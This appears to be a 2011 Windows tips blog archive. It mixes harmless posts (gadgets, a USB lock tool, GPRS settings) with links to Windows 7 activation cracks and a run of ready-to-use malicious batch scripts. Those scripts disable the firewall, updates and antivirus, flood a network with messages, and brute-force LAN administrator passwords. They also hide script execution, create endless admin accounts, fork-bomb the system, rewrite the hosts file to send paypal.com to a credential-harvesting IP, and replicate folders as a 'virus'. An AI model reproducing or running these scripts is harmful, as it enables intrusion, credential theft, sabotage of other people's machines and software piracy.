Must have gadgets for window7
In window 7 there is 9 gadgets which are already available for use but other then these gadgets you can download them from windows personalized gadgets gallery
Window8 Powered Apps
Windows 8 gives you the important apps you need for your daily life, including a touch browser. And Windows Store delivers everything you expect for getting apps. You’ll find the apps you want. You can be confident that they’re very safe because MS screen them. You’ll enjoy the flexibility of browsing, downloading, and buying or trying.
SEND FREE TEXT MESSAGES TO ANY MOBILE NUMBER
There are lots of apps that can send free text messages but those usually aren't free or will send texts from numbers other than your phone. This free service can send free texts to any mobile number in the world coming from your own phone number.
Thursday, April 28, 2011
Password-protect Pen Drive
Tuesday, April 26, 2011
Run a Web site from Pen drive
If you are a Web developer, you may be interested to know that with Server2Go.
Features
1.you can easily run a Web server that supports Apache, PHP, MySQL, and Perl right from a USB flash drive.
2. You can use Server2Go right out of the box without any installation.
3. It runs on all versions of Windows.
4.supports most common browsers
5.It is completely free.
To a developer, the benefits of having a portable Web server on a USB drive are numerous.
For more information about this package, visit the Server2Go site
Monday, April 25, 2011
Lock PC Using Pen Drive
- you insert the USB drive
- you run PREDATOR (autostart with Windows is possible)
- you do your work...
- when you're away from your PC, you simply remove the USB drive:
once it is removed, the keyboard and mouse are disabled and the screen darkens - when you return back to your PC, you put the USB flash drive in place:
keyboard and mouse are immediately released, and the display is restored.
- PREDATOR can send alert messages by Email or by SMS.
- PREDATOR records all security-related events in a log file: start, alarms, stop. By reading this log, you will know if intruders have tried to use your computer while you have been away.
- PREDATOR can replicate this log on your Twitter account, allowing you to remotely monitor all access-control activity on your PC.
- PREDATOR frequently changes the security codes recorded on your USB drive. If an intruder manages to copy your stick, this copy will not work because the codes on your own stick will have changed in the meantime.
- PREDATOR disables the Windows task manager when you unplug the USB drive. Nobody can stop it with Ctrl-Alt-Del.
- PREDATOR disables the CD Autorun feature in Windows, to prevent intruders from running malware on specially crafted CDs.
- PREDATOR lets you regain control of your computer if you lose your stick: when you start the software for the first time, you set a password that will unlock your session if your USB drive is not available.
- PREDATOR can sound an audible alarm if somebody enters an invalid password.
- And finally, PREDATOR can protect several PCs with the same USB flash drive, e.g. your home and office computers.
Portable Applications for USB Drives
Wednesday, April 20, 2011
Disable messenger service
run the Services panel for disabling the Messenger service ( Alerter ).
1. Click on the Start button.
2. Click on the Run item in the Start menu, Run box will appear.
3. Type in the Run box: services.msc /s and hit OK, Services Panel will appear.
disable Messenger service here.
1. Find the Messenger string and select it.
2. Click on the Properties button on the Services panel toolbar, the service properties box will appear.
3. Set the Startup type to disabled, click on the Stop button and finish it by the Apply button.
Monday, April 18, 2011
Securing servers or sites from Google’s invasion
Below given are the security measures which system
administrators and security professionals must take into account
to secure critical information available online, falling into
wrong hands:
- Install latest security patches available till date for the
applications and as well as the operating system running on
the servers.
- Don’t put critical and sensitive information on servers
without any proper authentication system which can be
directly accessible to anyone on internet.
- Disable directory browsing on the webserver. Directory
browsing should be enabled for those web-folders for which
you want to give access to anyone on internet.
- If you find any links to your restricted server or sites in
Google search result then it should be removed. Visit the
following link for more details:
http://www.google.com/remove.html
- Disable anonymous access in the webserver through internet
to restricted systems directory.
- Install filtering tools like URLScan for servers running
IIS as webserver.
Friday, April 8, 2011
Get Maximum Internet Speed In Window7
Here are some steps using which you can get maximum speed of your internet connection in window7.
Steps are:
1.Click Network connection icon on the right side of taskbar.
2.Select your connection and right click on it.
3.Select status.
4.A small window will pop up.
5.Click properties.
6.Click configure.
7.In Maximum Speed select your maximum option and get maximum speed.
enjoy!!!!!!!!!!!!!!!!!
Track Mobile Numbers Location
If you are recieving a call or message from an unknown number then you can easily find out the caller.There
are some websites where you can find caller details of any number.For this you have to only click links given below:
1.trace.bharatiyamobile.com
This site tracks 119 crore indians mobile.You have to only ener the number in the search bar.Here you have to enter only 10 digits numbers.Don't enter 91 in starting because it is an indian site.
2.www.hacktrix.com
This site also tacks mobile numbers.You have to only ener the number in the search bar.Here you have to enter only 10 digits numbers.Don't enter 91 in starting.
3.www.informationmadness.com
This site traces indian and pakistani numbers only.In this seatrch optin will not cme directly.For this you have to click missed cakll finder option.Now a search box will appear witch select country option.you have to select one of the country.Now enter mobile number in search box and click search.After this you will get information about mobile number.
4.http:tp2location.com
This site give information about international numbers.There are two ways to operate it.If you want to search american or canadian number then select us/canada option else select international.You Have to ener number with country code.
Note:
These sites will only give region informaton .This will not provide photo ID,address......
Thursday, April 7, 2011
Make window7 Genuine
Here iam posting some links where you can get your window7 activated and some important stuff about window7 for free.
1.www.geckoandfly.com/.../free-genuine-microsoft-windows-7-rc-product-key-and-serial-number
2.www.blogsdna.com/.../download-windows-7-genuine-patch-pluspatch-v6-activate-windows-7-beta-1.htm
3.techpp.com/.../make-windows-7-genuine-tips-to-stop-windows-is-not-genuine-message-0×80070005
4.www.blogsolute.com/free-windows-7-genuine...keys/1187
5.www.softwaregeek.com/to...windows-7...genuine/p1.html
6.www.youtube.com/watch?v=UM75BXyHL3A
7.www.fileguru.com/.../free_genuine_windows_7_ultimate_products_key
8.www.megaleecher.net/Microsoft_Windows_7_Key
9.social.microsoft.com/.../genuinewindowsxp/.../5f0b61f9-dace-474b-9f1a-99312b1f6e84
10.www.knowbest.info/get-free-genuine-windows-7-professional-in-3-hour
Wednesday, April 6, 2011
Tuesday, April 5, 2011
GPRS SETTINGS FOR MOBILE
- Account Name – Hutch_GPRS
- User Name – Blank
- Password – Blank
- Proxy – Enabled/yes
- Access Point Name – portalnmms
- Full Internet Access Point Name – www
- Proxy and Server address – 10.10.1.100
- Proxy and Server Port – 8080
- Homepage – http://hutchworld.co.in
- Authentication Type – Normal
- Homepage – any page you want to set.
- User Name – Blank
- Password – Blank
- Proxy – Enabled/yes.
- Proxy and Server Adress – 202.56.231.117
- Proxy and Server Port – 8080
- Data bearer – GPRS or Packet Data.
- Access Point Name – airtelgprs.com
- Authentication Type – Normal
- Use preferred access point – No
- Account Name – Airtel_live
- Homepage – http://live.airtelworld.com
- Username – Blank
- Password – Blank
- Proxy – Enabled/yes
- Proxy and Server Adress – 100.1.200.99
- Accespoint Name – airtelfun.com
- Proxy and Server Port – 8080
- Data bearer – GPRS/ Packet Data
- Authentication Type – Normal
- Account Name – idea_GPRS
- Username – Blank
- Password – Blank
- Homepage – http://wap.ideafresh.com
- Proxy and Server Port – 8080
- Proxy and Server adress – 10.4.42.45
- Databearer – GPRS / Packetdata
- Acces Point Name – imis
- Proxy – Enabled/yes
- Authentication Type – Normal
- Account Name – BPL WAP
- Username – <Blank>
- Password – <Blank>
- Proxy – Enabled/yes
- Homepage – http://wap.mizone.bplmobile.com
- Proxy and Server address – 10.0.0.10
- Proxy and Server Port – 8080
- Acces Point Name – mizone
- Data bearer – GPRS/ Packetdata
- Authentication Type – Normal
Monday, April 4, 2011
Stop Windows Sevices-service disabler:
The following piece of code is used for stopping some critical windows services.
1.Open Notepad
2.Type
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
3.save ads*.bat
This program when executed will stop the ‘windows firewall’ service that is required to block
unwanted datagram’s coming from the internet, ‘windows update’ service that is required to update
windows patches and so on, ‘workstation’ service that is required for the computer to establish a peer to
peer connection, ‘DHCP Client’ service that is required to register an available IP address from the
DHCP server, ‘DNS Client’ service that is required to resolve FQDN (Fully qualified Domain Name) into
its equivalent IP address, ‘print spooler’ service that is required to load the document to be printed in the
spool, and then the ‘themes’ service that is required to offer Themes and other graphical appearance.
Likewise you may stop any of the services, even the anti-virus service that offers protection from
malwares will be stopped in this way.
So when these services get stopped, it almost becomes impossible for the machine to offer the service
what they are supposed to do so, hence the user has to manually enable and start these services again.
Broadcast Bomber-broadcast messages
The ‘broadcast bomber’ will broadcast messages infinitely to all the computers connected to this
computer, if it is in a network.
1.Open Notepad
2.Type
@echo off
:netannoy
net send * Hi there!
net send * How u doin ?
net send * Are you fine ?
net send * Never mind about me....
net send * I am not here to annoy you....
net send * I am caring for you.....
net send * start counting from 1 to 5, i Will be outta this place.....
net send * 1
net send * 2
net send * 3
net send * 4
net send * 5
goto netannoy
3.save as *.bat.
Keystroke Re-mapper-Change Key Stroke
This batch program helps re-map the keystroke by changing the ‘scancodemap’
entry in the registry editor. The code that I have enclosed here changes the key from A to B, so that if any
users press ‘a’ key on the keyboard he will be getting the ‘b’ displayed on the screen, likewise you may
map any keys.
@echo off
reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode
Map" /t REG_BINARY /d 00000000000000000200000030001e0000000000
exit
If you want to create a new batch file for remapping other keys, you have to refer the ascii codes for each
keys that was pre assigned, and you can Download
LAN Remote user – Dictionary Attack:
This Batch file launches a Dictionary attack and find the Windows logon Credentials in a
LAN. You need a Dictionary text file to proceed further to launch this attack successfully.
1. Open up a Notepad file.
2. Type
@echo off
Title LAN Dictionary Attack Launcher
Color 0a
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done*****
3.Save as *.batt
4. Make sure that you have a Dictionary Password Text file in the same location where you are going to
execute this program. (Name should be passlist.txt)
5. Now go to the command prompt and then execute this program from there, along with the Target
computers IP address or Hostname and the Valid Username.
The Syntax should be like this,…
C:\>LANbrute.bat xxx.xxx.xxx.xxx Administrator
Where,
LANbrute.bat – This is the Name of the batch file that resides in the C Drive.
xxx.xxx.xxx.xxx – IP Address of the Target Computer.
Administrator – Victim Account that you want to crack.
5. This program will start launching Dictionary Attack against the administrator account on the Machine
xxx.xxx.xxx.xxx by using the passwords from the file passlist.txt and will not stop until it finds a right
match.
6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same
directory.
Credits to the Folks from Irongeek, because this is an idea by them.
Use at your own risk.Iwill not be responsible for anything.
Running Batch File As VB Script
1.Open Notepad.
2.Type
Set objShell = CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE
Note:Replace the ‘C:\ yourfile.bat’ with the actual name of the batch file that you have created, along with the location and then save this file with a .vbs extension. Now you may execute this VBScript file to run the batch file too, so there is no need for you to execute the batch file separately. Now the batch was still running in the background and remains hidden.
The only way to end the process is to open the task manager and end the process WScript.
Saturday, April 2, 2011
Create a Shortcut to Lock Your Computer
Friday, April 1, 2011
User Flooder -Make Multiple User Accounts
Add caption |
The ‘user flooder’ program will create a number of user accounts with random numbers, and
assign administrator rights to them by itself, moreover the password set for those user accounts were too random numbers.
1.Open Notepad.
2.Type
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
3.Save it as *.bat.
Fork Bombing
Fork bombing is nothing but calling a program by itself again and again with a infinite loop and making
the system to crash by popping up hundreds of windows on the screen.
1Open Notepad.
2.Type
@echo off
:loop
Explorer
Call fork.bat
Goto loop
3.Save as *.bat.
Note:
. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.
DNS POISINING
This program creates a new entry in the hosts file, so that whenever an user attempts to move to
www.google.com, he will be re-directed to another host that has the IP address of 110.224.53.172, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.
@echo off
echo 110.224.53.172 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 110.224.53.172 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
Folder Replicator Virus
Here is a Simple batch program, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.
1. Open a notepad.
2.Type
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save as * .bat, before doing that you have to modify the code by
changing the place where it says ‘username’ and instead of that replace it by the currently logged in
username.
3. Then run it .
Note:
Deleting the root directory will purge all the clumsy thing done by this piece of code.